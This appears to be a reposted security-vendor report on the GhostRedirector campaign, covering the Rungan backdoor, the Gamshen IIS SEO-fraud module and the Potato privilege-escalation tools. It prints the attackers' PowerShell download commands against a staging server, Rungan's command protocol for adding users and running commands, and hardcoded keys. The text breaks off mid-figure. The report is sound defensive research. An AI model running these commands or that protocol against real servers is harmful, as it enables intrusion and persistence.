{"id":257,"date":"2026-03-20T16:53:59","date_gmt":"2026-03-20T16:53:59","guid":{"rendered":"https:\/\/escudodigital.uy\/index.php\/2026\/03\/20\/backdoors-with-a-side-of-potatoes\/"},"modified":"2026-03-20T16:53:59","modified_gmt":"2026-03-20T16:53:59","slug":"backdoors-with-a-side-of-potatoes","status":"publish","type":"post","link":"https:\/\/escudodigital.uy\/index.php\/2026\/03\/20\/backdoors-with-a-side-of-potatoes\/","title":{"rendered":"Backdoors with a side of Potatoes"},"content":{"rendered":"<div>\n<p>ESET researchers have identified a new threat actor, whom we have named GhostRedirector, that compromised at least 65 Windows servers mainly in Brazil, Thailand, and Vietnam. GhostRedirector used two previously undocumented, custom tools: a passive C++ backdoor that we named Rungan, and a malicious Internet Information Services (IIS) module that we named Gamshen.<\/p>\n<p>While Rungan has the capability of executing commands on a compromised server, the purpose of Gamshen is to provide SEO fraud as-a-service, i.e., to manipulate search engine results, boosting the page ranking of a configured target website. Even though Gamshen only modifies the response when the request comes from Googlebot \u2013 i.e., it does not serve malicious content or otherwise affect regular visitors of the websites \u2013 participation in the SEO fraud scheme can hurt the compromised host website reputation by associating it with shady SEO techniques and the boosted websites.<\/p>\n<p>Interestingly, Gamshen is implemented as a native IIS module \u2013 IIS (Internet Information Services) is Microsoft\u2019s Windows web server software, which has a modular architecture supporting two types of extensions: native (C++ DLL) and managed (.NET assembly). There are different types of malware that can abuse this technology; our 2021 white paper Anatomy of native IIS malware provides a deep insight into the types of native IIS threats and their architecture. Gamshen falls under the category of a trojan with the main goal of facilitating SEO fraud, similar to IISerpent, which we documented previously.<\/p>\n<p>Besides Rungan and Gamshen, GhostRedirector also uses a series of other custom tools, as well as the publicly known exploits <a href=\"https:\/\/github.com\/zcgonvh\/EfsPotato\/\" target=\"_blank\" rel=\"noopener\">EfsPotato<\/a> and <a href=\"https:\/\/github.com\/BeichenDream\/BadPotato\/\" target=\"_blank\" rel=\"noopener\">BadPotato<\/a>, to create a privileged user on the server that can be used to download and execute other malicious components with higher privileges, or used as a fallback in case the Rungan backdoor or other malicious tools are removed from the compromised server. We believe with medium confidence that a China-aligned threat actor was behind these attacks. In this blogpost we provide insight into the GhostRedirector arsenal used to compromise its victims.<\/p>\n<blockquote>\n<p><strong>Key points of this blogpost:<\/strong><\/p>\n<ul>\n<li>We observed at least 65 Windows servers compromised in June 2025.<\/li>\n<li>Victims are mainly located in Brazil, Thailand, and Vietnam.<\/li>\n<li>Victims are not related to one specific sector but to a variety such as insurance, healthcare, retail, transportation, technology, and education.<\/li>\n<li>GhostRedirector has developed a new C++ backdoor, Rungan, capable of executing commands on the victim\u2019s server.<\/li>\n<li>GhostRedirector has developed a malicious native IIS module, Gamshen, that can perform SEO fraud; we believe its purpose is to artificially promote various gambling websites.<\/li>\n<li>GhostRedirector relies on public exploits such as BadPotato or EfsPotato for privilege escalation on compromised servers.<\/li>\n<li>Based on various factors, we conclude with medium confidence that a previously unknown, China-aligned threat actor was behind these attacks. We have named it GhostRedirector.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Attribution<\/h2>\n<p>We haven\u2019t been able to attribute this attack to any known group; thus we coined the new name GhostRedirector, to cluster all activities documented in this blogpost. These activities started in December of 2024, but we were able to discover other related samples that lead us believe that GhostRedirector has been active since at least August 2024.<\/p>\n<p>GhostRedirector has an arsenal that includes the passive C++ backdoor Rungan, the malicious IIS trojan Gamshen, and a variety of other utilities. We have clustered these tools together by:<\/p>\n<ul>\n<li>their presence on the same compromised server within the same timeframe,<\/li>\n<li>a shared staging server, and<\/li>\n<li>similarities in the PDB paths of various GhostRedirector tools, as explained below.<\/li>\n<\/ul>\n<p>We believe with medium confidence that GhostRedirector is a China-aligned threat actor, based on the following factors:<\/p>\n<ul>\n<li>multiple samples of GhostRedirector tools have hardcoded Chinese strings,<\/li>\n<li>a code-signing certificate issued to a Chinese company was used in the attack, and<\/li>\n<li>one of the passwords for GhostRedirector-created users on the compromised server contains the word <span style=\"font-family: courier new, courier, monospace;\">huang<\/span>, which is Chinese for yellow.<\/li>\n<\/ul>\n<p>GhostRedirector is not the first known case of a China-aligned threat actor engaging in SEO fraud via malicious IIS modules. Last year, Cisco Talos published a blogpost about a China-aligned threat actor called <a href=\"https:\/\/blog.talosintelligence.com\/dragon-rank-seo-poisoning\/\" target=\"_blank\" rel=\"noopener\">DragonRank<\/a> that conducts SEO fraud. There is some overlap in the victim geolocation (Thailand, India, and the Netherlands) and sectors (healthcare, transportation, and IT) in both attacks. However, it is likely that these were opportunistic attacks, exploiting as many vulnerable servers as possible, rather than targeting a specific set of entities. Besides these similarities, we don\u2019t have any reason to believe that DragonRank and GhostRedirector are linked, so we track these activities separately.<\/p>\n<h2>Victimology<\/h2>\n<p>Figure 1\u00a0shows a heatmap of the affected countries, combining data from two sources:<\/p>\n<ul>\n<li>ESET telemetry, where we detected these attacks between December 2024 and April 2025, and<\/li>\n<li>our internet-wide scan from June 2025 that we ran to get a better understanding of the scale of the attack, and that allowed us to identify additional victims.<\/li>\n<\/ul>\n<p>We notified all the victims that we identified through our internet scan about the compromise.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 1. Countries where victims were detected\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-1-countries-where-victims-were-detected.png\" alt=\"Figure 1 - Countries where victims were detected\" width=\"\" height=\"\"\/><figcaption><em>Figure 1. Countries where victims were detected<\/em><\/figcaption><\/figure>\n<p>With all the collected information, we found that at least 65 Windows servers were compromised worldwide. Most of the affected servers are in Brazil, Peru, Thailand, Vietnam, and the USA. Note that most of the compromised servers located in the USA appear to have been rented to companies that are based in countries from the previous list. We believe that GhostRedirector was more interested in targeting victims in South America and South Asia.<\/p>\n<p>Also, we observed a small number of cases in:<\/p>\n<ul>\n<li>Canada,<\/li>\n<li>Finland,<\/li>\n<li>India,<\/li>\n<li>the Netherlands,<\/li>\n<li>the Philippines, and<\/li>\n<li>Singapore.<\/li>\n<\/ul>\n<p>GhostRedirector doesn\u2019t seem to be interested in a particular vertical or sector; we have seen victims in sectors such as education, healthcare, insurance, transportation, technology, and retail.<\/p>\n<h2>Initial access<\/h2>\n<p>Based on ESET telemetry, we believe that GhostRedirector gains initial access to its victims by exploiting a vulnerability, probably an SQL Injection. Then it uses PowerShell to download various malicious tools \u2013 all from the same staging server, <span style=\"font-family: courier new, courier, monospace;\">868id[.]com<\/span>. In some cases, we have seen the attackers leveraging a different <a href=\"https:\/\/en.wiktionary.org\/wiki\/LOLBin\" target=\"_blank\" rel=\"noopener\">LOLBin<\/a>, CertUtil, for the same purpose.<\/p>\n<p>This conjecture is supported by our observation that most unauthorized PowerShell executions originated from the binary <span style=\"font-family: courier new, courier, monospace;\">sqlserver.exe<\/span>, which holds a stored procedure <span style=\"font-family: courier new, courier, monospace;\">xp_cmdshell<\/span> that can be used to execute commands on a machine.<\/p>\n<p>The following are examples of commands that we detected being executed on the compromised servers:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">cmd.exe \/d \/s \/c \u00bb powershell curl\u00a0 https:\/\/xzs.868id[.]com\/EfsNetAutoUser_br.exe -OutFile C:\\ProgramData\\EfsNetAutoUser_br.exe\u00bb<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">cmd.exe \/d \/s \/c \u00bb powershell curl\u00a0 http:\/\/xz.868id[.]com\/EfsPotato_sign.exe -OutFile C:\\ProgramData\\EfsPotato_sign.exe\u00bb<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">cmd.exe \/d \/s \/c \u00abpowershell curl\u00a0 https:\/\/xzs.868id[.]com\/link.exe\u00a0 -OutFile C:\\ProgramData\\link.exe\u00bb<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">powershell\u00a0 curl\u00a0 https:\/\/xzs.868id[.]com\/iis\/br\/ManagedEngine64_v2.dll -OutFile\u00a0 C:\\ProgramData\\Microsoft\\DRM\\log\\ManagedEngine64.dll<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">powershell\u00a0 curl https:\/\/xzs.868id[.]com\/iis\/IISAgentDLL.dll -OutFile\u00a0 C:\\ProgramData\\Microsoft\\DRM\\log\\miniscreen.dll<\/span><\/li>\n<\/ul>\n<p>We also encountered that GhostRedirector installed <a href=\"https:\/\/gotohttp.com\/\">GoToHTTP<\/a> on the compromised web server, after downloading it from the same staging server. GoToHTTP is a benign tool that allows establishing a remote connection that can be accessed from a browser.<\/p>\n<p>GhostRedirector used the directory <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\<\/span> to install its malware, particularly for the C++ backdoor and the IIS trojan they use the directory <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\Microsoft\\DRM\\log<\/span>.<\/p>\n<h2>Attack overview<\/h2>\n<p>An overview of the attack is shown in Figure 2. Attackers compromise a Windows server, download and execute various malicious tools: a privilege escalation tool, malware that drops multiple webshells, the passive C++ backdoor Rungan, or the IIS trojan Gamshen. The purpose of the privilege escalation tools is to create a privileged user in the Administrators group, so GhostRedirector can then leverage this account to execute privileged operations, or as a fallback in case the group loses access to the compromised server.<\/p>\n<p>\u00a0<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Attack overview\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/ghostredirector-figure-2.png\" alt=\"ghostredirector-figure 2\" width=\"\" height=\"\"\/><figcaption><em>Figure 2. Attack overview<\/em><\/figcaption><\/figure>\n<h2>Pernicious Potatoes performing privilege escalation<\/h2>\n<p>As part of its arsenal, GhostRedirector created several tools that leverage the local privilege escalation (<a href=\"https:\/\/attack.mitre.org\/tactics\/TA0004\/\" target=\"_blank\" rel=\"noopener\">LPE<\/a>) tactic, likely based on public EfsPotato and BadPotato exploits. Almost all of the analyzed samples were obfuscated with <a href=\"https:\/\/www.eziriz.com\/dotnet_reactor.htm\" target=\"_blank\" rel=\"noopener\">.NET Reactor<\/a>, with multiple layers of obfuscation. Some of the samples were validly signed with a code-signing certificate issued by TrustAsia RSA Code Signing CA G3, to <span style=\"font-family: courier new, courier, monospace;\">\u6df1\u5733\u5e02\u8fea\u5143\u7d20\u79d1\u6280\u6709\u9650\u516c\u53f8<\/span> (Shenzhen Diyuan Technology Co., Ltd.), and with a thumbprint of <span style=\"font-family: courier new, courier, monospace;\">BE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C<\/span>.<\/p>\n<p>The main goal of these samples was to create or modify a user account on the compromised server and add it to the Administrators group.<\/p>\n<p>During our analysis, we extracted from the analyzed samples the following usernames that were used in the creation of these malicious administrator users.<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">MysqlServiceEx<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">MysqlServiceEx2<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Admin<\/span><\/li>\n<\/ul>\n<p>Figure 3 shows the decompiled code used by these samples to create a user after successful LPE exploitation. The password has been redacted for security purposes.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 3. Portion of decompiled code that creates a new user on a victim server\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-3-portion-of-decompiled-code-that-creates-a-new-user-on-a-victim-server.png\" alt=\"Figure 3 - Portion of decompiled code that creates a new user on a victim server\" width=\"\" height=\"\"\/><figcaption><em>Figure 3. Portion of decompiled code that creates a new user on a victim server<\/em><\/figcaption><\/figure>\n<p>As seen in Figure 3, these privilege escalation tools use a custom C# class named <span style=\"font-family: courier new, courier, monospace;\">CUserHelper<\/span>. This class is implemented in a DLL named <span style=\"font-family: courier new, courier, monospace;\">Common.Global.DLL<\/span> (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">049C343A9DAAF3A93756562ED73375082192F5A8<\/span>), which we named Comdai and that was embedded in the analyzed samples. We believe that Comdai was created by the same developers as the rest of the GhostRedirector arsenal, based on the shared pattern in their respective PDB paths \u2013 see the repeated <span style=\"font-family: courier new, courier, monospace;\">x5<\/span> substring as shown in Table 1, which is shared between Rungan, Gamshen, and the privilege escalation tools.<\/p>\n<p style=\"text-align: center;\"><em>Table 1. PDB strings collected from GhostRedirector tools<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>Sample SHA1<\/strong><\/td>\n<td width=\"161\"><strong>Sample type<\/strong><\/td>\n<td width=\"303\"><strong>PDBs<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">049C343A9DAAF3A93756<wbr\/>562ED73375082192F5A8<\/span><\/td>\n<td width=\"161\">Comdai library<\/td>\n<td width=\"303\"><span style=\"font-family: courier new, courier, monospace;\">F:\\x5\\netTools\\oMain\\Common.Global<wbr\/>\\obj\\Release\\Common.Global.pdb<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">28140A5A29EBA098BC62<wbr\/>15DDAC8E56EACBB29B69<\/span><\/td>\n<td width=\"161\">Rungan, C++ backdoor<\/td>\n<td width=\"303\"><span style=\"font-family: courier new, courier, monospace;\">F:\\x5\\AvoidRandomKill-main<wbr\/>\\x64\\Release\\IISAgentDLL.pdb<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">871A4DF66A8BAC3E640B<wbr\/>2D1C0AFC075BB3761954<\/span><\/td>\n<td width=\"161\">Gamshen, IIS trojan<\/td>\n<td width=\"303\"><span style=\"font-family: courier new, courier, monospace;\">F:\\x5\\AvoidRandomKill-main<wbr\/>\\Release\\ManagedEngine64.pdb<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">371818BDC20669DF3CA4<wbr\/>4BE758200872D583A3B8<\/span><\/td>\n<td width=\"161\">Tool to create a new user<\/td>\n<td width=\"303\"><span style=\"font-family: courier new, courier, monospace;\">E:\\x5\\netTools\\WinSystem\\obj<wbr\/>\\Release\\uedit32_sign.pdb<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Table 2 provides an overview of the important classes implemented in Comdai that are used by GhostRedirector\u2019s various privilege escalation tools, along with the description of the class behavior. Note the <span style=\"font-family: courier new, courier, monospace;\">ExeHelper<\/span> class, which provides a function to execute a file named <span style=\"font-family: courier new, courier, monospace;\">link.exe<\/span> \u2013 GhostRedirector used the same filename to deploy the GoToHTTP tool.<\/p>\n<p>Also note the backdoor-like capabilities, including network communication, file execution, directory listing, and manipulating services and Windows registry keys. While we haven\u2019t observed these methods being used by any known GhostRedirector components, this shows that Comdai is a versatile tool that can support various stages of the attack.<\/p>\n<p style=\"text-align: center;\"><em>Table 2. Classes implemented in Comdai<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"132\"><strong>C# class<\/strong><\/td>\n<td width=\"510\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">AES<\/span><\/td>\n<td width=\"510\">Encrypts\/Decrypts AES in ECB mode.<br \/>Key: <span style=\"font-family: courier new, courier, monospace;\">030201090405060708091011121315<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">CUserHelper<\/span><\/td>\n<td width=\"510\">Lists users on a compromised server.<br \/>Creates a user with specified credentials and adds it into a group name also specified by an argument; by default it uses the Administrators group.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ExeHelper<\/span><\/td>\n<td width=\"510\">Used to execute a binary named <span style=\"font-family: courier new, courier, monospace;\">link.exe<\/span>. This name was used by the attackers for the GoToHTTP binary.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">HttpHelper<\/span><\/td>\n<td width=\"510\">Can perform through different methods, GET and POST requests, with an unknown purpose, to a hardcoded URL \u2013 <span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.cs01[.]shop<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">MsgData<\/span><\/td>\n<td width=\"510\">Contains only attributes, used by the class <span style=\"font-family: courier new, courier, monospace;\">NodejsTX<\/span> to deserialize a JSON object.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">MyDll<\/span><\/td>\n<td width=\"510\">Invokes methods from an unknown DLL named <span style=\"font-family: courier new, courier, monospace;\">MyDLL.dll<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">NodejsTX<\/span><\/td>\n<td width=\"510\">Provides a method to communicate with another malicious component via pipes; the pipe is named <span style=\"font-family: courier new, courier, monospace;\">salamander_pipe<\/span>, which can receive parameters to create a specified user who is then added to the administrators group. This user creation is achieved by invoking a method from the <span style=\"font-family: courier new, courier, monospace;\">CUserHelper<\/span> class.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">RegeditHelper<\/span><\/td>\n<td width=\"510\">Contains a method for reading the value of a specified windows registry key.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ScanfDirectory<\/span><\/td>\n<td width=\"510\">Contains methods for listing the contents of a specified directory.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ServiceHelper<\/span><\/td>\n<td width=\"510\">Contains methods to restart a specified service.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">SystemHelper<\/span><\/td>\n<td width=\"510\">Contains methods to execute a binary or execute commands via <a href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.diagnostics.processstartinfo?view=net-8.0\" target=\"_blank\" rel=\"noopener\">ProcessStartInfo<\/a> class. The binary or commands are provided to <a href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.diagnostics.processstartinfo?view=net-8.0\" target=\"_blank\" rel=\"noopener\">ProcessStartInfo<\/a> as arguments.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">UserStruct<\/span><\/td>\n<td width=\"510\">Contains only attributes, username \u2013 string<br \/>Groups \u2013 list<string><br \/>Attributes are used by class <span style=\"font-family: courier new, courier, monospace;\">CUserHelper<\/span> for listing users.<\/string><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Some exceptions to the rule<\/h3>\n<p>We discovered a sample (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">21E877AB2430B72E3DB12881D878F78E0989BB7F<\/span>) using the same certificate, uploaded to VirusTotal in August 2024, which we believe is related to GhostRedirector\u2019s arsenal, although we didn\u2019t see it used during this campaign. This assumption is based on the behavior of the sample, which tries to open a text file and send its contents to a hardcoded URL. For this, the sample contains an embedded Comdai DLL and it invokes the Comdai C# class <span style=\"font-family: courier new, courier, monospace;\">HttpHelper<\/span>, which has a hardcoded URL that is <span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.cs01[.]shop<\/span> \u2013 the same domain mentioned in Table 2.<\/p>\n<p>We also discovered some privilege escalation tools that differ a little from the behavior mentioned previously.<\/p>\n<p>For example, in one case (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">5A01981D3F31AF47614E51E6C216BED70D921D60<\/span>), instead of creating a new user, it changes the password of an existing user <span style=\"font-family: courier new, courier, monospace;\">Guest<\/span> for one hardcoded in the malware and then, using the <a href=\"https:\/\/blog.netwrix.com\/2023\/05\/20\/rid-hijacking\/\" target=\"_blank\" rel=\"noopener\">RID hijacking<\/a> technique, it attempts to add this user to the administrator groups.<\/p>\n<p>In another case (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">9DD282184DDFA796204C1D90A46CAA117F46C8E1<\/span>), the tool not only creates a new administrator user but also installs multiple webshells on a specific path in the victim\u2019s servers, provided manually by GhostRedirector as an argument to the tool.<\/p>\n<p>These webshells are embedded in the resources of the sample in cleartext, and the names are hardcoded; the names we saw used are:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">C1.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Cmd.aspx<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Error.aspx<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">K32.asxp<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">K64.aspx<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">LandGrey.asp<\/span><\/li>\n<\/ul>\n<h2><a name=\"_Toc205852299\"\/>Zunput, a website information collector plus webshell dropper<\/h2>\n<p>Another interesting tool used by GhostRedirector had the filename <span style=\"font-family: courier new, courier, monospace;\">SitePuts.exe<\/span>. This sample (SHA\u20111: <span style=\"font-family: courier new, courier, monospace;\">EE22BA5453ED577F8664CA390EB311D067E47786<\/span>), which we named Zunput, is also developed with the .NET Framework and signed with the certificate mentioned above; it reads the IIS configuration system looking for configured websites and obtains the following information about them:<\/p>\n<ul>\n<li>physical path on the server,<\/li>\n<li>name, and<\/li>\n<li>for each site, the following attributes:\n<p style=\"margin-top: 1em;\"><span style=\"color: #00a0a0; font-size: 1em; vertical-align: middle;\">\u25cb<\/span> protocol<\/p>\n<p><span style=\"color: #00a0a0; vertical-align: middle;\">\u25cb<\/span> IP address, and<\/p>\n<p><span style=\"color: #00a0a0; font-size: 1em; vertical-align: middle;\">\u25cb <\/span>hostname<\/p>\n<\/li>\n<\/ul>\n<p>Once the information is collected, Zunput checks for the existence of the physical path on the server, and also verifies that the directory contains at least one file with the <span style=\"font-family: courier new, courier, monospace;\">.php<\/span>, .<span style=\"font-family: courier new, courier, monospace;\">aspx<\/span>, or <span style=\"font-family: courier new, courier, monospace;\">.asp<\/span> extension. This way, Zunput only targets active websites capable of executing dynamic content \u2013 only in those directories does it then drop the embedded webshells. Webshells are embedded in the resources of the sample and for the dates of each webshell (creation, modified, accessed), the malware uses the date of an existing file from the directory.<\/p>\n<p>Webshells are written in ASP, PHP, and JavaScript, and the names used are selected randomly from the following list:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">Xml<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Ajax<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Sync<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Loadapi<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Loadhelp<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Code<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Jsload<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Loadcss<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Loadjs<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Pop3<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Imap<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Api<\/span><\/li>\n<\/ul>\n<p>Extensions used for the webshells:<\/p>\n<p>Information collected during Zunput execution is saved in a file named <span style=\"font-family: courier new, courier, monospace;\">log.txt<\/span> (see an example in Figure 4) in the directory from which it was executed. This information isn\u2019t exfiltrated automatically by Zunput, but it can be obtained by the attackers through several methods; one can be via the deployed webshell mentioned before.<\/p>\n<figure class=\"image\"><img decoding=\"async\" style=\"width: 70%; margin: 0 auto; display: block;\" title=\"Figure 4. Example of saved content of log.txt where \u5206\u5272\u7ebf machine translates to Dividing line\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-4-example-of-saved-content-of-log-txt.png\" alt=\"Figure 4 - Example of saved content of log txt\" width=\"\" height=\"\"\/><figcaption><em>Figure 4. Example of saved content of <\/em><span style=\"font-family: courier new, courier, monospace;\">log.txt<\/span><em> where <\/em><span style=\"font-family: courier new, courier, monospace;\">\u5206\u5272\u7ebf<\/span><em> machine translates to Dividing line<\/em><\/figcaption><\/figure>\n<h2>The final payloads<\/h2>\n<h3>Rungan, a passive C++ backdoor<\/h3>\n<p>Rungan (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">28140A5A29EBA098BC6215DDAC8E56EACBB29B69<\/span>) is a passive C\/C++ backdoor that we have seen installed in <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\Microsoft\\DRM\\log\\miniscreen.dll<\/span>.<\/p>\n<p>This backdoor uses AES in CBC mode for string decryption. <span style=\"font-family: courier new, courier, monospace;\">030201090405060708090A0B0C0D0E0F<\/span>\u00a0is used for the IV and key, and based on the malware\u2019s PDB path <span style=\"font-family: courier new, courier, monospace;\">F:\\x5\\AvoidRandomKill-main\\x64\\Release\\IISAgentDLL.pdb<\/span>, we believe that GhostRedirector reuses the AES implementation from the <a href=\"https:\/\/github.com\/minhangxiaohui\/AvoidRandomKill\/blob\/main\/AvoidRandomKill\/AES.cpp\" target=\"_blank\" rel=\"noopener\">AvoidRandomKill repository<\/a>.<\/p>\n<p>The main functionality of this backdoor is to register a plaintext hardcoded URL <span style=\"font-family: courier new, courier, monospace;\">http:\/\/+:80\/v1.0\/8888\/sys.html<\/span> into the compromised server, bypassing IIS by abusing the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/http\/http-api-start-page\" target=\"_blank\" rel=\"noopener\">HTTP Server API<\/a>. Then the backdoor waits for a request that matches that URL, then parses and executes the received commands on the compromised server.<\/p>\n<p>Additional URLs can be set in an optional configuration file named <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\1033\\vbskui.dll<\/span>. Rungan will listen to all incoming requests matching the configured patterns, and the configuration can be updated via a backdoor command. To activate the backdoor, any incoming HTTP request must contain a specific combination of parameters and values, which are hardcoded in Rungan.<\/p>\n<p>Once this check is met, Rungan uses the parameter <span style=\"font-family: courier new, courier, monospace;\">action<\/span> to determine the backdoor command, and uses the data in the HTTP request body as the command parameters. No encryption or encoding is used in the C&amp;C protocol. The most notable capabilities are creating a new user or executing commands on the victim\u2019s server; a full list of backdoor commands is shown in Table 3.<\/p>\n<p style=\"text-align: center;\"><em>Table 3.Rungan backdoors commands<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"104\"><strong>Parameter<\/strong><\/td>\n<td width=\"189\"><strong>Body<\/strong><\/td>\n<td width=\"198\"><strong>Description<\/strong><\/td>\n<td width=\"151\"><strong>Response<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"104\"><span style=\"font-family: courier new, courier, monospace;\">mkuser<\/span><\/td>\n<td width=\"189\"><span style=\"font-family: courier new, courier, monospace;\">user=<username>&amp;pwd=<password>&amp;groupname=<groupname\/><\/password><\/username><\/span><\/td>\n<td width=\"198\">Creates the specified user on the compromised server using the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/lmaccess\/nf-lmaccess-netuseradd\">NetUserAdd<\/a> Windows API.<\/td>\n<td width=\"151\">Status code of the operation.<\/td>\n<\/tr>\n<tr>\n<td width=\"104\"><span style=\"font-family: courier new, courier, monospace;\">listfolder<\/span><\/td>\n<td width=\"189\"><span style=\"font-family: courier new, courier, monospace;\">path=<a_path\/><\/span><\/td>\n<td width=\"198\">This looks unfinished: it collects information from selected path but doesn\u2019t exfiltrate it.<\/td>\n<td width=\"151\">N\/A<\/td>\n<\/tr>\n<tr>\n<td width=\"104\"><span style=\"font-family: courier new, courier, monospace;\">addurl<\/span><\/td>\n<td width=\"189\"><span style=\"font-family: courier new, courier, monospace;\">url=<url_1>|<url_2\/><\/url_1><\/span><\/td>\n<td width=\"198\">Registers URLs the backdoor will listen on. Can be more than one separated with <span style=\"font-family: courier new, courier, monospace;\">|<\/span>. The URL is also added to the configuration file.<\/td>\n<td width=\"151\">If a URL fails to register, the response will be <span style=\"font-family: courier new, courier, monospace;\">Failed: <url\/><\/span>, otherwise <span style=\"font-family: courier new, courier, monospace;\">All Ok<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"104\"><span style=\"font-family: courier new, courier, monospace;\">cmd<\/span><\/td>\n<td width=\"189\"><span style=\"font-family: courier new, courier, monospace;\">cmdpath=<cmd_path>&amp;mingl=<command_to_execute\/><\/cmd_path><\/span><\/td>\n<td width=\"198\">Executes a command on the victim\u2019s server using pipes and the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/processthreadsapi\/nf-processthreadsapi-createprocessa\" target=\"_blank\" rel=\"noopener\">CreatePorcessA<\/a> API.<\/td>\n<td width=\"151\">Command output.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Figure 5 and Figure 6 show different examples of requests made to the malware during a dynamic analysis using the tool <a href=\"https:\/\/www.postman.com\/\" target=\"_blank\" rel=\"noopener\">postman<\/a> in a simulated environment.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 5. Executing commands on a testing server\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-5-executing-commands-on-a-testing-server.png\" alt=\"Figure 5 - Executing commands on a testing server\" width=\"\" 